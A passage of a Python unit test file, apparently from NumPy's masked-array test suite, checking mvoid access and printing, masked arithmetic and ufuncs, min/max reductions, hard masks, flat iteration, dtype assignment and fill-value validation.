f = mvoid(a)
assert_(isinstance(f, mvoid))
a = masked_array([(1, 2)], mask=[(1, 0)], dtype=ndtype)[0]
assert_(isinstance(a, mvoid))
a = masked_array([(1, 2), (1, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
f = mvoid(a._data[0], a._mask[0])
assert_(isinstance(f, mvoid))
def test_mvoid_getitem(self):
# Test mvoid.__getitem__
ndtype = [('a', int), ('b', int)]
a = masked_array([(1, 2,), (3, 4)], mask=[(0, 0), (1, 0)],
dtype=ndtype)
# w/o mask
f = a[0]
self.assertTrue(isinstance(f, mvoid))
assert_equal((f[0], f['a']), (1, 1))
assert_equal(f['b'], 2)
# w/ mask
f = a[1]
self.assertTrue(isinstance(f, mvoid))
self.assertTrue(f[0] is masked)
self.assertTrue(f['a'] is masked)
assert_equal(f[1], 4)
def test_mvoid_iter(self):
# Test iteration on __getitem__
ndtype = [('a', int), ('b', int)]
a = masked_array([(1, 2,), (3, 4)], mask=[(0, 0), (1, 0)],
dtype=ndtype)
# w/o mask
assert_equal(list(a[0]), [1, 2])
# w/ mask
assert_equal(list(a[1]), [masked, 4])
def test_mvoid_print(self):
# Test printing a mvoid
mx = array([(1, 1), (2, 2)], dtype=[('a', int), ('b', int)])
assert_equal(str(mx[0]), "(1, 1)")
mx['b'][0] = masked
ini_display = masked_print_option._display
masked_print_option.set_display("-X-")
try:
assert_equal(str(mx[0]), "(1, -X-)")
assert_equal(repr(mx[0]), "(1, -X-)")
finally:
masked_print_option.set_display(ini_display)
def test_mvoid_multidim_print(self):
# regression test for gh-6019
t_ma = masked_array(data = [([1, 2, 3],)],
mask = [([False, True, False],)],
fill_value = ([999999, 999999, 999999],),
dtype = [('a', '<i8', (3,))])
assert str(t_ma[0]) == "([1, --, 3],)"
assert repr(t_ma[0]) == "([1, --, 3],)"
# additonal tests with structured arrays
t_2d = masked_array(data = [([[1, 2], [3,4]],)],
mask = [([[False, True], [True, False]],)],
dtype = [('a', '<i8', (2,2))])
assert str(t_2d[0]) == "([[1, --], [--, 4]],)"
assert repr(t_2d[0]) == "([[1, --], [--, 4]],)"
t_0d = masked_array(data = [(1,2)],
mask = [(True,False)],
dtype = [('a', '<i8'), ('b', '<i8')])
assert str(t_0d[0]) == "(--, 2)"
assert repr(t_0d[0]) == "(--, 2)"
t_2d = masked_array(data = [([[1, 2], [3,4]], 1)],
mask = [([[False, True], [True, False]], False)],
dtype = [('a', '<i8', (2,2)), ('b', float)])
assert str(t_2d[0]) == "([[1, --], [--, 4]], 1.0)"
assert repr(t_2d[0]) == "([[1, --], [--, 4]], 1.0)"
t_ne = masked_array(data=[(1, (1, 1))],
mask=[(True, (True, False))],
dtype = [('a', '<i8'), ('b', 'i4,i4')])
assert str(t_ne[0]) == "(--, (--, 1))"
assert repr(t_ne[0]) == "(--, (--, 1))"
def test_object_with_array(self):
mx1 = masked_array([1.], mask=[True])
mx2 = masked_array([1., 2.])
mx = masked_array([mx1, mx2], mask=[False, True])
assert mx[0] is mx1
assert mx[1] is not mx2
assert np.all(mx[1].data == mx2.data)
assert np.all(mx[1].mask)
# check that we return a view.
mx[1].data[0] = 0.
assert mx2[0] == 0.
class TestMaskedArrayArithmetic(TestCase):
# Base test class for MaskedArrays.
def setUp(self):
# Base data definition.
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
a10 = 10.
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
z = np.array([-.5, 0., .5, .8])
zm = masked_array(z, mask=[0, 1, 0, 0])
xf = np.where(m1, 1e+20, x)
xm.set_fill_value(1e+20)
self.d = (x, y, a10, m1, m2, xm, ym, z, zm, xf)
self.err_status = np.geterr()
np.seterr(divide='ignore', invalid='ignore')
def tearDown(self):
np.seterr(**self.err_status)
def test_basic_arithmetic(self):
# Test of basic arithmetic.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
a2d = array([[1, 2], [0, 4]])
a2dm = masked_array(a2d, [[0, 0], [1, 0]])
assert_equal(a2d * a2d, a2d * a2dm)
assert_equal(a2d + a2d, a2d + a2dm)
assert_equal(a2d - a2d, a2d - a2dm)
for s in [(12,), (4, 3), (2, 6)]:
x = x.reshape(s)
y = y.reshape(s)
xm = xm.reshape(s)
ym = ym.reshape(s)
xf = xf.reshape(s)
assert_equal(-x, -xm)
assert_equal(x + y, xm + ym)
assert_equal(x - y, xm - ym)
assert_equal(x * y, xm * ym)
assert_equal(x / y, xm / ym)
assert_equal(a10 + y, a10 + ym)
assert_equal(a10 - y, a10 - ym)
assert_equal(a10 * y, a10 * ym)
assert_equal(a10 / y, a10 / ym)
assert_equal(x + a10, xm + a10)
assert_equal(x - a10, xm - a10)
assert_equal(x * a10, xm * a10)
assert_equal(x / a10, xm / a10)
assert_equal(x ** 2, xm ** 2)
assert_equal(abs(x) ** 2.5, abs(xm) ** 2.5)
assert_equal(x ** y, xm ** ym)
assert_equal(np.add(x, y), add(xm, ym))
assert_equal(np.subtract(x, y), subtract(xm, ym))
assert_equal(np.multiply(x, y), multiply(xm, ym))
assert_equal(np.divide(x, y), divide(xm, ym))
def test_divide_on_different_shapes(self):
x = arange(6, dtype=float)
x.shape = (2, 3)
y = arange(3, dtype=float)
z = x / y
assert_equal(z, [[-1., 1., 1.], [-1., 4., 2.5]])
assert_equal(z.mask, [[1, 0, 0], [1, 0, 0]])
z = x / y[None,:]
assert_equal(z, [[-1., 1., 1.], [-1., 4., 2.5]])
assert_equal(z.mask, [[1, 0, 0], [1, 0, 0]])
y = arange(2, dtype=float)
z = x / y[:, None]
assert_equal(z, [[-1., -1., -1.], [3., 4., 5.]])
assert_equal(z.mask, [[1, 1, 1], [0, 0, 0]])
def test_mixed_arithmetic(self):
# Tests mixed arithmetics.
na = np.array([1])
ma = array([1])
self.assertTrue(isinstance(na + ma, MaskedArray))
self.assertTrue(isinstance(ma + na, MaskedArray))
def test_limits_arithmetic(self):
tiny = np.finfo(float).tiny
a = array([tiny, 1. / tiny, 0.])
assert_equal(getmaskarray(a / 2), [0, 0, 0])
assert_equal(getmaskarray(2 / a), [1, 0, 1])
def test_masked_singleton_arithmetic(self):
# Tests some scalar arithmetics on MaskedArrays.
# Masked singleton should remain masked no matter what
xm = array(0, mask=1)
self.assertTrue((1 / array(0)).mask)
self.assertTrue((1 + xm).mask)
self.assertTrue((-xm).mask)
self.assertTrue(maximum(xm, xm).mask)
self.assertTrue(minimum(xm, xm).mask)
def test_masked_singleton_equality(self):
# Tests (in)equality on masked snigleton
a = array([1, 2, 3], mask=[1, 1, 0])
assert_((a[0] == 0) is masked)
assert_((a[0] != 0) is masked)
assert_equal((a[-1] == 0), False)
assert_equal((a[-1] != 0), True)
def test_arithmetic_with_masked_singleton(self):
# Checks that there's no collapsing to masked
x = masked_array([1, 2])
y = x * masked
assert_equal(y.shape, x.shape)
assert_equal(y._mask, [True, True])
y = x[0] * masked
assert_(y is masked)
y = x + masked
assert_equal(y.shape, x.shape)
assert_equal(y._mask, [True, True])
def test_arithmetic_with_masked_singleton_on_1d_singleton(self):
# Check that we're not losing the shape of a singleton
x = masked_array([1, ])
y = x + masked
assert_equal(y.shape, x.shape)
assert_equal(y.mask, [True, ])
def test_scalar_arithmetic(self):
x = array(0, mask=0)
assert_equal(x.filled().ctypes.data, x.ctypes.data)
# Make sure we don't lose the shape in some circumstances
xm = array((0, 0)) / 0.
assert_equal(xm.shape, (2,))
assert_equal(xm.mask, [1, 1])
def test_basic_ufuncs(self):
# Test various functions such as sin, cos.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
assert_equal(np.cos(x), cos(xm))
assert_equal(np.cosh(x), cosh(xm))
assert_equal(np.sin(x), sin(xm))
assert_equal(np.sinh(x), sinh(xm))
assert_equal(np.tan(x), tan(xm))
assert_equal(np.tanh(x), tanh(xm))
assert_equal(np.sqrt(abs(x)), sqrt(xm))
assert_equal(np.log(abs(x)), log(xm))
assert_equal(np.log10(abs(x)), log10(xm))
assert_equal(np.exp(x), exp(xm))
assert_equal(np.arcsin(z), arcsin(zm))
assert_equal(np.arccos(z), arccos(zm))
assert_equal(np.arctan(z), arctan(zm))
assert_equal(np.arctan2(x, y), arctan2(xm, ym))
assert_equal(np.absolute(x), absolute(xm))
assert_equal(np.angle(x + 1j*y), angle(xm + 1j*ym))
assert_equal(np.angle(x + 1j*y, deg=True), angle(xm + 1j*ym, deg=True))
assert_equal(np.equal(x, y), equal(xm, ym))
assert_equal(np.not_equal(x, y), not_equal(xm, ym))
assert_equal(np.less(x, y), less(xm, ym))
assert_equal(np.greater(x, y), greater(xm, ym))
assert_equal(np.less_equal(x, y), less_equal(xm, ym))
assert_equal(np.greater_equal(x, y), greater_equal(xm, ym))
assert_equal(np.conjugate(x), conjugate(xm))
def test_count_func(self):
# Tests count
assert_equal(1, count(1))
assert_equal(0, array(1, mask=[1]))
ott = array([0., 1., 2., 3.], mask=[1, 0, 0, 0])
res = count(ott)
self.assertTrue(res.dtype.type is np.intp)
assert_equal(3, res)
ott = ott.reshape((2, 2))
res = count(ott)
assert_(res.dtype.type is np.intp)
assert_equal(3, res)
res = count(ott, 0)
assert_(isinstance(res, ndarray))
assert_equal([1, 2], res)
assert_(getmask(res) is nomask)
ott = array([0., 1., 2., 3.])
res = count(ott, 0)
assert_(isinstance(res, ndarray))
assert_(res.dtype.type is np.intp)
assert_raises(IndexError, ott.count, 1)
def test_minmax_func(self):
# Tests minimum and maximum.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
# max doesn't work if shaped
xr = np.ravel(x)
xmr = ravel(xm)
# following are true because of careful selection of data
assert_equal(max(xr), maximum(xmr))
assert_equal(min(xr), minimum(xmr))
assert_equal(minimum([1, 2, 3], [4, 0, 9]), [1, 0, 3])
assert_equal(maximum([1, 2, 3], [4, 0, 9]), [4, 2, 9])
x = arange(5)
y = arange(5) - 2
x[3] = masked
y[0] = masked
assert_equal(minimum(x, y), where(less(x, y), x, y))
assert_equal(maximum(x, y), where(greater(x, y), x, y))
assert_(minimum(x) == 0)
assert_(maximum(x) == 4)
x = arange(4).reshape(2, 2)
x[-1, -1] = masked
assert_equal(maximum(x), 2)
def test_minimummaximum_func(self):
a = np.ones((2, 2))
aminimum = minimum(a, a)
self.assertTrue(isinstance(aminimum, MaskedArray))
assert_equal(aminimum, np.minimum(a, a))
aminimum = minimum.outer(a, a)
self.assertTrue(isinstance(aminimum, MaskedArray))
assert_equal(aminimum, np.minimum.outer(a, a))
amaximum = maximum(a, a)
self.assertTrue(isinstance(amaximum, MaskedArray))
assert_equal(amaximum, np.maximum(a, a))
amaximum = maximum.outer(a, a)
self.assertTrue(isinstance(amaximum, MaskedArray))
assert_equal(amaximum, np.maximum.outer(a, a))
def test_minmax_reduce(self):
# Test np.min/maximum.reduce on array w/ full False mask
a = array([1, 2, 3], mask=[False, False, False])
b = np.maximum.reduce(a)
assert_equal(b, 3)
def test_minmax_funcs_with_output(self):
# Tests the min/max functions with explicit outputs
mask = np.random.rand(12).round()
xm = array(np.random.uniform(0, 10, 12), mask=mask)
xm.shape = (3, 4)
for funcname in ('min', 'max'):
# Initialize
npfunc = getattr(np, funcname)
mafunc = getattr(numpy.ma.core, funcname)
# Use the np version
nout = np.empty((4,), dtype=int)
try:
result = npfunc(xm, axis=0, out=nout)
except MaskError:
pass
nout = np.empty((4,), dtype=float)
result = npfunc(xm, axis=0, out=nout)
self.assertTrue(result is nout)
# Use the ma version
nout.fill(-999)
result = mafunc(xm, axis=0, out=nout)
self.assertTrue(result is nout)
def test_minmax_methods(self):
# Additional tests on max/min
(_, _, _, _, _, xm, _, _, _, _) = self.d
xm.shape = (xm.size,)
assert_equal(xm.max(), 10)
self.assertTrue(xm[0].max() is masked)
self.assertTrue(xm[0].max(0) is masked)
self.assertTrue(xm[0].max(-1) is masked)
assert_equal(xm.min(), -10.)
self.assertTrue(xm[0].min() is masked)
self.assertTrue(xm[0].min(0) is masked)
self.assertTrue(xm[0].min(-1) is masked)
assert_equal(xm.ptp(), 20.)
self.assertTrue(xm[0].ptp() is masked)
self.assertTrue(xm[0].ptp(0) is masked)
self.assertTrue(xm[0].ptp(-1) is masked)
x = array([1, 2, 3], mask=True)
self.assertTrue(x.min() is masked)
self.assertTrue(x.max() is masked)
self.assertTrue(x.ptp() is masked)
def test_addsumprod(self):
# Tests add, sum, product.
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
assert_equal(np.add.reduce(x), add.reduce(x))
assert_equal(np.add.accumulate(x), add.accumulate(x))
assert_equal(4, sum(array(4), axis=0))
assert_equal(4, sum(array(4), axis=0))
assert_equal(np.sum(x, axis=0), sum(x, axis=0))
assert_equal(np.sum(filled(xm, 0), axis=0), sum(xm, axis=0))
assert_equal(np.sum(x, 0), sum(x, 0))
assert_equal(np.product(x, axis=0), product(x, axis=0))
assert_equal(np.product(x, 0), product(x, 0))
assert_equal(np.product(filled(xm, 1), axis=0), product(xm, axis=0))
s = (3, 4)
x.shape = y.shape = xm.shape = ym.shape = s
if len(s) > 1:
assert_equal(np.concatenate((x, y), 1), concatenate((xm, ym), 1))
assert_equal(np.add.reduce(x, 1), add.reduce(x, 1))
assert_equal(np.sum(x, 1), sum(x, 1))
assert_equal(np.product(x, 1), product(x, 1))
def test_binops_d2D(self):
# Test binary operations on 2D data
a = array([[1.], [2.], [3.]], mask=[[False], [True], [True]])
b = array([[2., 3.], [4., 5.], [6., 7.]])
test = a * b
control = array([[2., 3.], [2., 2.], [3., 3.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b * a
control = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
a = array([[1.], [2.], [3.]])
b = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [0, 0], [0, 1]])
test = a * b
control = array([[2, 3], [8, 10], [18, 3]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b * a
control = array([[2, 3], [8, 10], [18, 7]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
def test_domained_binops_d2D(self):
# Test domained binary operations on 2D data
a = array([[1.], [2.], [3.]], mask=[[False], [True], [True]])
b = array([[2., 3.], [4., 5.], [6., 7.]])
test = a / b
control = array([[1. / 2., 1. / 3.], [2., 2.], [3., 3.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b / a
control = array([[2. / 1., 3. / 1.], [4., 5.], [6., 7.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
a = array([[1.], [2.], [3.]])
b = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [0, 0], [0, 1]])
test = a / b
control = array([[1. / 2, 1. / 3], [2. / 4, 2. / 5], [3. / 6, 3]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b / a
control = array([[2 / 1., 3 / 1.], [4 / 2., 5 / 2.], [6 / 3., 7]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
def test_noshrinking(self):
# Check that we don't shrink a mask when not wanted
# Binary operations
a = masked_array([1., 2., 3.], mask=[False, False, False],
shrink=False)
b = a + 1
assert_equal(b.mask, [0, 0, 0])
# In place binary operation
a += 1
assert_equal(a.mask, [0, 0, 0])
# Domained binary operation
b = a / 1.
assert_equal(b.mask, [0, 0, 0])
# In place binary operation
a /= 1.
assert_equal(a.mask, [0, 0, 0])
def test_noshink_on_creation(self):
# Check that the mask is not shrunk on array creation when not wanted
a = np.ma.masked_values([1., 2.5, 3.1], 1.5, shrink=False)
assert_equal(a.mask, [0, 0, 0])
def test_mod(self):
# Tests mod
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
assert_equal(mod(x, y), mod(xm, ym))
test = mod(ym, xm)
assert_equal(test, np.mod(ym, xm))
assert_equal(test.mask, mask_or(xm.mask, ym.mask))
test = mod(xm, ym)
assert_equal(test, np.mod(xm, ym))
assert_equal(test.mask, mask_or(mask_or(xm.mask, ym.mask), (ym == 0)))
def test_TakeTransposeInnerOuter(self):
# Test of take, transpose, inner, outer products
x = arange(24)
y = np.arange(24)
x[5:6] = masked
x = x.reshape(2, 3, 4)
y = y.reshape(2, 3, 4)
assert_equal(np.transpose(y, (2, 0, 1)), transpose(x, (2, 0, 1)))
assert_equal(np.take(y, (2, 0, 1), 1), take(x, (2, 0, 1), 1))
assert_equal(np.inner(filled(x, 0), filled(y, 0)),
inner(x, y))
assert_equal(np.outer(filled(x, 0), filled(y, 0)),
outer(x, y))
y = array(['abc', 1, 'def', 2, 3], object)
y[2] = masked
t = take(y, [0, 3, 4])
assert_(t[0] == 'abc')
assert_(t[1] == 2)
assert_(t[2] == 3)
def test_imag_real(self):
# Check complex
xx = array([1 + 10j, 20 + 2j], mask=[1, 0])
assert_equal(xx.imag, [10, 2])
assert_equal(xx.imag.filled(), [1e+20, 2])
assert_equal(xx.imag.dtype, xx._data.imag.dtype)
assert_equal(xx.real, [1, 20])
assert_equal(xx.real.filled(), [1e+20, 20])
assert_equal(xx.real.dtype, xx._data.real.dtype)
def test_methods_with_output(self):
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
funclist = ('sum', 'prod', 'var', 'std', 'max', 'min', 'ptp', 'mean',)
for funcname in funclist:
npfunc = getattr(np, funcname)
xmmeth = getattr(xm, funcname)
# A ndarray as explicit input
output = np.empty(4, dtype=float)
output.fill(-9999)
result = npfunc(xm, axis=0, out=output)
# ... the result should be the given output
assert_(result is output)
assert_equal(result, xmmeth(axis=0, out=output))
output = empty(4, dtype=int)
result = xmmeth(axis=0, out=output)
assert_(result is output)
assert_(output[0] is masked)
def test_eq_on_structured(self):
# Test the equality of structured arrays
ndtype = [('A', int), ('B', int)]
a = array([(1, 1), (2, 2)], mask=[(0, 1), (0, 0)], dtype=ndtype)
test = (a == a)
assert_equal(test, [True, True])
assert_equal(test.mask, [False, False])
b = array([(1, 1), (2, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
test = (a == b)
assert_equal(test, [False, True])
assert_equal(test.mask, [True, False])
b = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = (a == b)
assert_equal(test, [True, False])
assert_equal(test.mask, [False, False])
def test_ne_on_structured(self):
# Test the equality of structured arrays
ndtype = [('A', int), ('B', int)]
a = array([(1, 1), (2, 2)], mask=[(0, 1), (0, 0)], dtype=ndtype)
test = (a != a)
assert_equal(test, [False, False])
assert_equal(test.mask, [False, False])
b = array([(1, 1), (2, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
test = (a != b)
assert_equal(test, [True, False])
assert_equal(test.mask, [True, False])
b = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = (a != b)
assert_equal(test, [False, True])
assert_equal(test.mask, [False, False])
def test_eq_w_None(self):
# Really, comparisons with None should not be done, but check them
# anyway. Note that pep8 will flag these tests.
# With partial mask
a = array([1, 2], mask=[0, 1])
assert_equal(a == None, False)
assert_equal(a.data == None, False)
assert_equal(a.mask == None, False)
assert_equal(a != None, True)
# With nomask
a = array([1, 2], mask=False)
assert_equal(a == None, False)
assert_equal(a != None, True)
# With complete mask
a = array([1, 2], mask=True)
assert_equal(a == None, False)
assert_equal(a != None, True)
# Fully masked, even comparison to None should return "masked"
a = masked
assert_equal(a == None, masked)
def test_eq_w_scalar(self):
a = array(1)
assert_equal(a == 1, True)
assert_equal(a == 0, False)
assert_equal(a != 1, False)
assert_equal(a != 0, True)
def test_numpyarithmetics(self):
# Check that the mask is not back-propagated when using numpy functions
a = masked_array([-1, 0, 1, 2, 3], mask=[0, 0, 0, 0, 1])
control = masked_array([np.nan, np.nan, 0, np.log(2), -1],
mask=[1, 1, 0, 0, 1])
test = log(a)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(a.mask, [0, 0, 0, 0, 1])
test = np.log(a)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(a.mask, [0, 0, 0, 0, 1])
class TestMaskedArrayAttributes(TestCase):
def test_keepmask(self):
# Tests the keep mask flag
x = masked_array([1, 2, 3], mask=[1, 0, 0])
mx = masked_array(x)
assert_equal(mx.mask, x.mask)
mx = masked_array(x, mask=[0, 1, 0], keep_mask=False)
assert_equal(mx.mask, [0, 1, 0])
mx = masked_array(x, mask=[0, 1, 0], keep_mask=True)
assert_equal(mx.mask, [1, 1, 0])
# We default to true
mx = masked_array(x, mask=[0, 1, 0])
assert_equal(mx.mask, [1, 1, 0])
def test_hardmask(self):
# Test hard_mask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d, mask=m, hard_mask=True)
# We need to copy, to avoid updating d in xh !
xs = array(d, mask=m, hard_mask=False, copy=True)
xh[[1, 4]] = [10, 40]
xs[[1, 4]] = [10, 40]
assert_equal(xh._data, [0, 10, 2, 3, 4])
assert_equal(xs._data, [0, 10, 2, 3, 40])
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
assert_equal(xs.mask, [0, 0, 0, 1, 0])
self.assertTrue(xh._hardmask)
self.assertTrue(not xs._hardmask)
xh[1:4] = [10, 20, 30]
xs[1:4] = [10, 20, 30]
assert_equal(xh._data, [0, 10, 20, 3, 4])
assert_equal(xs._data, [0, 10, 20, 30, 40])
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
assert_equal(xs.mask, nomask)
xh[0] = masked
xs[0] = masked
assert_equal(xh.mask, [1, 0, 0, 1, 1])
assert_equal(xs.mask, [1, 0, 0, 0, 0])
xh[:] = 1
xs[:] = 1
assert_equal(xh._data, [0, 1, 1, 3, 4])
assert_equal(xs._data, [1, 1, 1, 1, 1])
assert_equal(xh.mask, [1, 0, 0, 1, 1])
assert_equal(xs.mask, nomask)
# Switch to soft mask
xh.soften_mask()
xh[:] = arange(5)
assert_equal(xh._data, [0, 1, 2, 3, 4])
assert_equal(xh.mask, nomask)
# Switch back to hard mask
xh.harden_mask()
xh[xh < 3] = masked
assert_equal(xh._data, [0, 1, 2, 3, 4])
assert_equal(xh._mask, [1, 1, 1, 0, 0])
xh[filled(xh > 1, False)] = 5
assert_equal(xh._data, [0, 1, 2, 5, 5])
assert_equal(xh._mask, [1, 1, 1, 0, 0])
xh = array([[1, 2], [3, 4]], mask=[[1, 0], [0, 0]], hard_mask=True)
xh[0] = 0
assert_equal(xh._data, [[1, 0], [3, 4]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
xh[-1, -1] = 5
assert_equal(xh._data, [[1, 0], [3, 5]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
xh[filled(xh < 5, False)] = 2
assert_equal(xh._data, [[1, 2], [2, 5]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
def test_hardmask_again(self):
# Another test of hardmask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d, mask=m, hard_mask=True)
xh[4:5] = 999
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
xh[0:1] = 999
assert_equal(xh._data, [999, 1, 2, 3, 4])
def test_hardmask_oncemore_yay(self):
# OK, yet another test of hardmask
# Make sure that harden_mask/soften_mask//unshare_mask returns self
a = array([1, 2, 3], mask=[1, 0, 0])
b = a.harden_mask()
assert_equal(a, b)
b[0] = 0
assert_equal(a, b)
assert_equal(b, array([1, 2, 3], mask=[1, 0, 0]))
a = b.soften_mask()
a[0] = 0
assert_equal(a, b)
assert_equal(b, array([0, 2, 3], mask=[0, 0, 0]))
def test_smallmask(self):
# Checks the behaviour of _smallmask
a = arange(10)
a[1] = masked
a[1] = 1
assert_equal(a._mask, nomask)
a = arange(10)
a._smallmask = False
a[1] = masked
a[1] = 1
assert_equal(a._mask, zeros(10))
def test_shrink_mask(self):
# Tests .shrink_mask()
a = array([1, 2, 3], mask=[0, 0, 0])
b = a.shrink_mask()
assert_equal(a, b)
assert_equal(a.mask, nomask)
def test_flat(self):
# Test that flat can return all types of items [#4585, #4615]
# test simple access
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
assert_equal(test.flat[1], 2)
assert_equal(test.flat[2], masked)
self.assertTrue(np.all(test.flat[0:2] == test[0, 0:2]))
# Test flat on masked_matrices
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
test.flat = masked_array([3, 2, 1], mask=[1, 0, 0])
control = masked_array(np.matrix([[3, 2, 1]]), mask=[1, 0, 0])
assert_equal(test, control)
# Test setting
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
testflat = test.flat
testflat[:] = testflat[[2, 1, 0]]
assert_equal(test, control)
testflat[0] = 9
assert_equal(test[0, 0], 9)
# test 2-D record array
# ... on structured array w/ masked records
x = array([[(1, 1.1, 'one'), (2, 2.2, 'two'), (3, 3.3, 'thr')],
[(4, 4.4, 'fou'), (5, 5.5, 'fiv'), (6, 6.6, 'six')]],
dtype=[('a', int), ('b', float), ('c', '|S8')])
x['a'][0, 1] = masked
x['b'][1, 0] = masked
x['c'][0, 2] = masked
x[-1, -1] = masked
xflat = x.flat
assert_equal(xflat[0], x[0, 0])
assert_equal(xflat[1], x[0, 1])
assert_equal(xflat[2], x[0, 2])
assert_equal(xflat[:3], x[0])
assert_equal(xflat[3], x[1, 0])
assert_equal(xflat[4], x[1, 1])
assert_equal(xflat[5], x[1, 2])
assert_equal(xflat[3:], x[1])
assert_equal(xflat[-1], x[-1, -1])
i = 0
j = 0
for xf in xflat:
assert_equal(xf, x[j, i])
i += 1
if i >= x.shape[-1]:
i = 0
j += 1
# test that matrices keep the correct shape (#4615)
a = masked_array(np.matrix(np.eye(2)), mask=0)
b = a.flat
b01 = b[:2]
assert_equal(b01.data, array([[1., 0.]]))
assert_equal(b01.mask, array([[False, False]]))
def test_assign_dtype(self):
# check that the mask's dtype is updated when dtype is changed
a = np.zeros(4, dtype='f4,i4')
m = np.ma.array(a)
m.dtype = np.dtype('f4')
repr(m) # raises?
assert_equal(m.dtype, np.dtype('f4'))
# check that dtype changes that change shape of mask too much
# are not allowed
def assign():
m = np.ma.array(a)
m.dtype = np.dtype('f8')
assert_raises(ValueError, assign)
b = a.view(dtype='f4', type=np.ma.MaskedArray) # raises?
assert_equal(b.dtype, np.dtype('f4'))
# check that nomask is preserved
a = np.zeros(4, dtype='f4')
m = np.ma.array(a)
m.dtype = np.dtype('f4,i4')
assert_equal(m.dtype, np.dtype('f4,i4'))
assert_equal(m._mask, np.ma.nomask)
class TestFillingValues(TestCase):
def test_check_on_scalar(self):
# Test _check_fill_value set to valid and invalid values
_check_fill_value = np.ma.core._check_fill_value
fval = _check_fill_value(0, int)
assert_equal(fval, 0)
fval = _check_fill_value(None, int)
assert_equal(fval, default_fill_value(0))
fval = _check_fill_value(0, "|S3")
assert_equal(fval, asbytes("0"))
fval = _check_fill_value(None, "|S3")
assert_equal(fval, default_fill_value(b"camelot!"))
self.assertRaises(TypeError, _check_fill_value, 1e+20, int)
self.assertRaises(TypeError, _check_fill_value, 'stuff', int)
def test_check_on_fields(self):
# Tests _check_fill_value with records
_check_fill_value = np.ma.core._check_fill_value
ndtype = [('a', int), ('b', float), ('c', "|S3")]
# A check on a list should return a single record
fval = _check_fill_value([-999, -12345678.9, "???"], ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
# A check on None should output the defaults
fval = _check_fill_value(None, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [default_fill_value(0),
default_fill_value(0.),
asbytes(default_fill_value("0"))])
#.....Using a structured type as fill_value should work
fill_val = np.array((-999, -12345678.9, "???"), dtype=ndtype)
fval = _check_fill_value(fill_val, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....Using a flexible type w/ a different type shouldn't matter
# BEHAVIOR in 1.5 and earlier: match structured types by position
#fill_val = np.array((-999, -12345678.9, "???"),
# dtype=[("A", int), ("B", float), ("C", "|S3")])
# BEHAVIOR in 1.6 and later: match structured types by name
fill_val = np.array(("???", -999, -12345678.9),
dtype=[("c", "|S3"), ("a", int), ("b", float), ])
fval = _check_fill_value(fill_val, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....Using an object-array shouldn't matter either
fill_val = np.ndarray(shape=(1,), dtype=object)
fill_val[0] = (-999, -12345678.9, asbytes("???"))
fval = _check_fill_value(fill_val, object)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
# NOTE: This test was never run properly as "fill_value" rather than
# "fill_val" was assigned. Written properly, it fails.
#fill_val = np.array((-999, -12345678.9, "???"))
#fval = _check_fill_value(fill_val, ndtype)
#self.assertTrue(isinstance(fval, ndarray))
